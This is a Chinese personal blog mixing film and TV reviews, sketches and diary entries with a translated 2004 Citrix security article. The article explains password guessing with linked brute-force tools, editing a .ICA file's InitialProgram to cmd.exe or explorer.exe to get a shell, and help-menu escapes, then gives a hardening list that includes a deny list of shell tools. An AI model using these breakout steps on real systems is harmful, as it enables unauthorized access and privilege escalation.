在史蒂文.斯皮尔伯格的电影中，屠杀往往意味着真正的开始，《Immolation》在配乐中也占据着相同的位置，弦乐紧张而不确定。但就像[辛德勒的名单]里挣扎在饥饿与痛苦中的波兰人民是不会沉默的一般，这首乐曲也是配乐从头至尾最残酷的时刻。开始时约翰.威廉姆斯还能用最优美的旋律讲故事，但随着影片情节的跌宕，配乐的基调了随之改变，快乐的气氛也越来越少，一首一首地听下去，会发现自己也莫名其妙地跟着悲壮起来。《Schindler`s Workforce》这首超过十分钟的曲子令人由衷赞叹，它舒缓了先前的戏剧化冲突，管弦乐柔和的有些压抑，当乐曲进行到三分多钟忽然转到E小调的时候，悲剧色彩铺天盖地迎面扑来，挡在听者与影片情节发展之间最后的阻碍被打破了。《Auschwitz-Birkenau》急促的小提琴和激动的弦乐验证了这样的感受，约翰.威廉姆斯头脑中此时所想的也不再是怎样“安慰”，而是如何真实地反映血腥。
深呼吸一次，接下来的《Stolen Memories》让人感觉倍加温暖，也许久违了的东西才最不易被忘怀，紧张的情绪被暂时放在旁边，原声吉他的运用是最亮丽的一抹色彩。这样的感动在《Making the list》中达到高潮，某种意义上讲，这首作品像极了威廉姆斯的另外一部经典[星球大战]。《Give Me Your Names 》略微有些脆弱，较影片开始时的音乐主题显得平淡，也许是为了衬托后面《Yeroushalaim Chel Zahav》的神圣，这首简单的作品实际上却蕴涵了巨大的情绪感染力，明亮的旋律跳动意味着悲剧的结束，同样也象征着一个民族新的开始。
一个母亲追着那辆把她的孩子载去奥斯维辛的大卡车后面声嘶力竭地哭泣，她的孩子已经踏上了死地。当这个场景出现的时候，一首荡气回肠的带着非常忧郁色彩的民族歌曲相伴进行着，歌曲的名字叫做《Oifen Pripetchik》，是由一群唱诗班的孩子们用犹太人的依地语合唱的。这更像是一首启蒙式的字母歌，那种纯真的忧伤令无数人动容。“Oifen Pripetchik”的意思是“热情在火炉中燃烧”。
[辛德勒的名单]这部带有鲜明纪录片色彩的电影在我看来多少有些残酷，但出色的音乐为它的黑白基调染上了一丝温情，我肯定这部影片的色彩感是应该被“听”出来的。假设如果没有约翰.威廉姆斯的音乐，那无法想象史蒂文.斯皮尔伯格的电影会是什么样子。

---------------转载《看电影》

《随时候命》是一部香港感情剧，说的是香港飞行服务队（GFS）中队员的生活感情经历。说实话我很少看这类电视，一个是因为觉得太无聊，而且没时间，但是这部我却很喜欢。

剧中GFS队员高的女朋友施三年前由于一次交通意外成为植物人，在这三年中高精心照顾，施居然奇迹般的恢复，虽失去了记忆，但高排除万难重新追求施，两人终于重新走到一起。没想到随着两人恋情越来越升温，施逐渐发现自己并不适合高，并且施终于想起来，三年前那个发生交通意外的夜晚，自己本来是去一间意大利餐厅和高分手。在17集最后，高在同一间餐厅约施吃饭，施终于坦白自己的感受……

在17集最后这段，镜头突然开始摇晃，好像是手持设备拍摄的，我没有觉得不妥，而且我甚至认为这样处理非常好，摇晃的镜头象征剧中两人摇摇欲坠的感情，音乐使用过一段较为沉重的交响乐，暗示感情矛盾冲突的升级，两个人生死别离，好不容易聚在一起，却发现这不过是错觉。一个是自己深爱五年的女人，在她昏迷期间不离不弃；一个是对照顾自己三年的男友，但是却无法在一起；这真是一个讽刺！

人生有时候就是这样，你以为是对的，其实是错的，你认为是错的，其实那才是对的。但是什么又是对什么又是错？这次是对的，下次呢？很多话想说，却如鲠在喉。真好像一位朋友说的：“生活就是现场直播，没有第二次机会”

17集最后这段感情戏之后，全剧人物的命运都开始发生转折，所以这里也算是全剧的一个点睛之笔。不过我总觉得这里很特别……，虽然前面已经埋下了很多伏笔，我还是觉得似乎和全剧有些格格不入。

PS：女主人公姓康，不姓施，多谢下面的路过兄。

哈哈，同事画的。

HB铅笔

这个效果很不好，以后还是签字笔比较好。

0.5极细签字笔

0.5极细签字笔

// 很久以前翻译的一篇文章，2004年发给黑防了。

编者按：虚拟工作平台已开始的从单纯的透过网页传播信息，变化到利用Internet、Interanet、Extranet的基础建设来达到合作、交易及知识管理的目的。这项新的网页环境最基本需求之一是安全的配置、重要的营业应用软件。不相容的整合导致无法即时分享重要的信息，造成时间、金钱及附加价值的损失。这是为什么成千上万个大型企业团体选择在全球具有领导地位的Citrix的主要原因。下文介绍的是Citrix中不可忽略的一个因素——安全！

Citrix 系统的安全分析
原作者/Brian Madden
翻译/417
一、介绍
Citrix系统是一款广泛流行的远程桌面控制程序，类似于 Microsoft 的 Terminal Services，但是原理不同，Microsoft Terminal Services 使用的是 RDP(Remote Desktop Protocol) 协议，而 Citrix 使用的是 ICA (Independent Computing Architecture)协议。(实际上 Microsoft 买断了 Citrix 的另一项技术 Citrix MultiWin，并使它可以与 Windows 同内核工作，以支持多用户并行会话，在 Windows 2000 操作系统中才被正式命名为RDP。Citrix 的产品和技术已被全球超过2000万的用户所采纳，其中包括世界财富100强的所有企业和公司，世界财富500强的企业中亦有85%选用 Citrix 的产品。Citrix 的客户包括 MCI Worldcom、Qantas、朗讯、北方电信、摩托罗拉、诺基亚、香港电信、JPMorgan、雀巢公司、壳牌集团、UCLA（加利福尼亚大学洛杉矶分校）、香港大学等等——译者注)
在本文中，我将简要介绍Citrix是怎样工作的，和如何更好的配置Citrix使用者权限。
要声明的是，作者是Citrix MetaFrame XP的高级技术顾问之一，但并不是Citrix的管理员，以下有些想法并不完美，不过本文的重点并不是这些，请根据具体情况。如果有错误可以联系 wirepair@roguemail.net。
二、Citrix 的工作方式
我列在这里的是几种Citrix可能被用到的解决方式：
1、Citrix MetaFrame
Citrix MetaFrame 有三个不同的版本：XPs，XPa及 XPe。分别适合不同的环境使用。其中 XPe 是完全安全版，包括一些不同于其他版本的管理选项。XPa 和 XPe 则稍微少一点。在此篇文章中，我们只讨论 XPe，但是其中的大部分功能都能在其他版本上应用。Citrix 默认使用 1494 端口并且只和使用了 Citrix ICA 加密协议的客户端通信。
2、Citrix NFuse/Citrix 安全网关
Citrix NFuse 允许管理员锁定程序而只能通过 Web 浏览器通信。Citrix NFuse 默认是安装的 IIS 5.0 上的，但是在这篇文章中，我们将试着把它安装在 Apache 上。当然也许读者对在 IIS 5.0 上的安装/配置/管理 Citrix NFuse 更感性趣，我们稍后会涉及到这个问题。下面谈到的应用若没有特别指出则全部使用 SSL 128 位加密。
Citrix NFuse 默认安装情况下的远程权限规则允许管理员执行 Citrix 安全网关。如果管理员适当的配置了 NFuse，远程用户将则不能直接通过 Citrix Server。所有通过 Citrix NFuse 服务器和安全网关的连接将被过滤。如图1所示：

图1
三、以攻击者的角度思考问题
根据简图，我们发现使用者不能获得一个和 Citrix Server 直接的连接，但是可以通过 DMZ 到 Internal network。
在默认安装的 NFuse 并且没有安全网关配合的情况下，使用者接触到 NFuse Web Server,之后一旦发出了请求并确认，使用者将获得一个直接连接 Citrix Server 的通道，你可以看出这个有个问题，恶意使用者可以在和 Citrix Server 连接好的情况下，再进行先前的请求扫描，通过搜集请求列表之后建立自己的 .ICA 文件，里面包含了他们指定的信息。这就意味着，如果当前的情况是在网络边界，就有两个漏洞可以通过防火墙。一个是 IIS，一个是 Citrix。
.ICA 文件是一种基于文本结构的文档，包含所有的配置信息。这个文件一般是给最终用户使用，在安装完 Citrix 客户端以后，双击这个文件就可以自动连接 .ICA 文件中指定的服务器。
如果 NFuse 被使用的情况下通常就不需要 .ICA 文件了。假设 A 用户打开 Web 浏览器来到 NFuse Web 服务器，将使用他在 NT 域中的账号。如果成功登陆，A 用户将得到一张他 Citrix Farm 上有权使用的程序列表。
有多种方法可以得到运行在 Citrix 主机上的远程桌面，最近 Ian Vitek 发布了一些很有用的 PERL 脚本工具。我最常用的扫描 Citrix 请求的工具在这个可以下载：
http://www.cqure.net/itools01.html
这个工具列出了远程机器上允许的请求，得到这些列表之后我们就可以通过修改 .ICA 文件中的请求信息。再这之后，你就可以尝试针对一些容易猜到的账号进行攻击，我的经验是尝试攻击一些专门用来做备份工作的账号。
（如果上面的程序在你的机器上不能很好的工作，你可以试试这个:http://sh0dan.org/files/pubappbrute.tar.gz）
假设你已经做好一切准备，只是没有好运气的话，你可以尝试 GUEST 账号，虽然通常情况下GUEST没有足够的登陆权限。
从 .ICA 文件入手来看：
[WFClient]
Version=2
TcpBrowserAddress=ip.ip.ip.ip

[ApplicationServers]
word=

[word]
Address=word
InitialProgram=#word
ClientAudio=Off
Compress=On
TWIMode=On
DesiredHRES=800
DesiredVRES=600
DesiredColor=4
TransportDriver=TCP/IP
WinStationDriver=ICA 3.0

通过分析看来Citrix在运行时似乎寻找了 [word] 中 InitialProgram 的数据。如果我们把这个数据修改成cmd.exe 或 explorer.exe 会怎么样？呵呵，幸运的是我们真的可以指定运行这个程序，我曾利用这个方法无数次的绕过了登陆检查。只要确定程序是有效的存在的我们就可以运行它。现在我们已经在Citrix有了一个远程 shell。如果你运行的是 explorer.exe，那么你就打开了一个真正的桌面。我希望你熟悉如何提升自己的权限，在这里我就不多说了。另外，即使我以 guest 身份进入系统，我也可以运行只有管理员才可以运行的工具。很明显，这是一个严重的漏洞，你可以在网络上发现大量的弱口令用户。
如果他们使用 NFuse 和 Citrix Secure Gateway 过滤了所有通过防火墙的连接。这样你修改 .ICA 文件就没用了。但是我们仍有很多的机会获得远程桌面。一般情况下 Citrix 管理员经常在办公室远程操作，太好了，如果你有权远程使用 excel ，做个一个 vbscript 当到启动菜单里面，就算你像我一样懒，只是用 IE 浏览网页的话，我们也可以得到 C:\winnt\explorer.exe，其他 Microsoft Word 软件都可以做到。实际上决大多数情况下，我们可以通过 帮助-->帮助主题-->跳至URL 填写 cmd.exe 你可以下载它。如果你的远程机器上有写权限，修改你的.ICA 文件，哈哈，你又可以得到一个 shell 了。
类似的方法还有很多，你可以打开进程管理器启动一个新的进程，或者利用大部分程序中 打开-->浏览 获得一个 shell,如果你可以浏览远程机器，还可以从默认的配置文件目录：
NT4 ： %systemroot%\profiles\username\Application Data\
Windows 2000 ： C:\Documents and Settings\username\Application Data\
将里面的 .ICA 文件复制过来，覆盖你相应目录下的文件，之后打开 Citrix Program Neighborhood 你会发现你有权向所有已经连接的用户发出修改密码的消息。
四、安全的Citrix
还好这里有很多资料来提醒管理员加固Citrix，我曾经花费几周的时间试图找出一个应用与安全相平衡的安全策略：
1、首先正确配置 NFuse / Citrix Secure Gateway
2、确定 IIS/Apache 已经打了最新补丁，并且在 DMZ 的保护中，或者使用 NTLM 认证
3、如果可能，要求远程用户使用 SecureID 认证方式（原有的 ICA 认证方式，被发现存在弱加密算法漏洞——译者注）
4、使用其它的浏览器取代 IE
5、建立一个组，把所有Citrix用户放到这个组里面，禁止他们访问 cmd.exe, ftp.exe, tftp.exe, rcp.exe, net.exe,command.com, iexplorer.exe 等可能对系统有危害的权限(在安全与应用的平衡之间选择)
6、给你的Citrix打上最新的补丁
7、禁止 winhelp32 的访问，设置 Internet 选项禁止下载,禁止使用进程管理器
8、如果可能，设置 Citrix Connection Configuration—>ica-tcp—>client settings —>选择必须
五、写在最后
翻译完着篇文章发现 Citrix系统很类似现在网吧广泛应用的类似虚拟桌面的程序，在研究了应用比较广泛的几款网吧管理程序后发现，此类程序都并非建立的系统内核基础上，很容易利用 Windows 本身的机制绕过，这才是这类软件漏洞产生的根本原因。

名词解析：
DMZ：De-Militarized Zone，非军事区，是防火墙的一个特性。它可以使某台特定计算机向互连网开放。有些应用程序需要开通多个TCP/IP接口。而DMZ就可以为微机实现这些功能。

今天晚上不知道怎么了，特别伤感，莫非快月圆了？

人年纪大了，就是容易想过去的时候，最近我把这几年的工作历程回忆了一边，总结了不少东西。特别是最近这两年，看到的，学到的……

昨天晚上开始锻炼，兴冲冲的，结果早上腰腿酸痛……

朗姆酒最初产于古巴，使用古巴本地盛产的甘蔗蜜糖经过多年酿制生产出来的。其品质主要由酿制的年份决定，从一年到几十年不等，一般市场上出售的是三年、七年酿制两种。

说实话，纯种的朗姆酒其实酒精也比较高，从google查到最高酒精度居然有75.5%，据说象征了古巴加勒比精神－自由、色彩和激情……

我以前喝过一个牌子的叫：百家得（BACARDI），据说是惟一由私人经营的烈性酒公司，不过我喝的是勾兑的那种，而且有各种口味，酒精浓度只有4.8%。

肠炎好了，却发现一个奇怪的事，我饮食口味变了！以前总喜欢肥肉、油腻的食物，现在想想都恶心的不行，倒是对清单点的蔬菜情有独钟。

以前喝速溶咖啡总觉得没味，太淡，今天早上同样的一杯居然觉得特别香浓，甚至有点太甜了，又加了点水。

生活上也开始喜欢锻炼身体，昨天晚上破天荒地到楼下跑了三圈，老胳膊老腿的运动了一下。早上起来精神很好的去上班，没迟到。

周末无事可作，起床后收拾收拾就走路去公司，路上有很多卖盗版书的小贩，由于平时从来没注意过，抱着说不定可以淘到一本好书的心理，挑了一处人少的凑过去看。

可惜好书不多，只选了本《正说中国三百五十帝》，刚要离开时发现角落里面有本霍金的《时间简史》（呵呵，我对这些未知的神秘事物最有兴趣），抽出来看了两眼，立刻晕的不行，卖书的老板看我有兴趣马上说了一句：“这书卖的很好！”，我苦笑说：“可惜我看不懂。”

这时旁边的一个年轻人，也就大学生的样子，抬头撇了一眼我手里的书皮说：

“怎么会看不懂？这书我初中的时候就看了两遍，虽然具体的原理不明白，但是大概意思还是能看懂。”

（这句是原话）

我诧异了！如果霍老头知道中国的空间科学能普及到这种程度那一定会很欣慰。

前几天和同事去吃自助，结果急性肠炎。连拉了好几天肚子，某个部位因为频繁使用已经不堪重负。

唉，再也不吃自助了。

今天早上由于某些巨大诱惑的原因，我穿了皮鞋、西裤、衬衫、带了领带（以前就打好的，一直没解），照照镜子。

“小伙子，挺帅的啊！”，自己对自己说了一句。

其实我这个人也就是平时不爱打扮，要是打扮起来那也是英俊潇洒、玉树临风、才高八斗、学富五车、貌似潘安、人面桃花，这就难怪人送我一外号：玉面小飞龙呢。以下省略两万字……

打理一番后上班，一进门立马迷倒一片，“和老板出去了？”、“相亲？”、“参加婚礼？”、“～！@#￥％^”，在

晚上事情办完，回家后把领带一解，完了！解开了不知道怎么系！重新拿起来在脖子上一通狂绕，最后打了一个死结不说解的时候还差点把自己勒死！

幸好有google，领带还没有解开我就已经在网上找到正确的打法，试验了几种，发现半温莎式比较适合我，图解记录如下：

PS：

这图得有些空间想像力才能看得懂，我不过我总结了“上亮，下亮，中亮”的六字口诀，应该不会忘记了。

说起来好笑，以前高中的时候每次受点挫折总是喜欢翻出雅尼的曲子，大半夜躺在被窝里面听，还把感想写下来，美名曰“思想”。现在回忆起来好像每次都是听着听着就睡着了。

我又想起来以前曾经有一位老艺术家曾经说过，他这辈子指挥过无数次《命运》交响乐，但是真正理解她还是在文化大革命蹲牛棚的时候。

本着他说过的话，今天晚上我把一些老歌下载下来温习，放眼看去，日！首先看到的居然是《出卖》，删了！

随便点了一个mp3，耳机里面好几秒钟没有生意，突然一串清脆的钢琴演奏，沉重、重复、单调，一下子就把我的心揪起来了，之后是连绵不绝的钢琴、小提琴、低音女生，中间好像还穿插着民族风格的段子，不用看我就知道是《十面埋伏》结尾曲，以前看电影的时候就觉得有些特别，随便搜索了一个保存了。

又重复听了无数遍，感觉好像爬山，一个山峰又是一个山峰，象俄罗斯的老爷车缓慢而沉重，歌词怎么也找不到了。

算了，不写了，有些乱。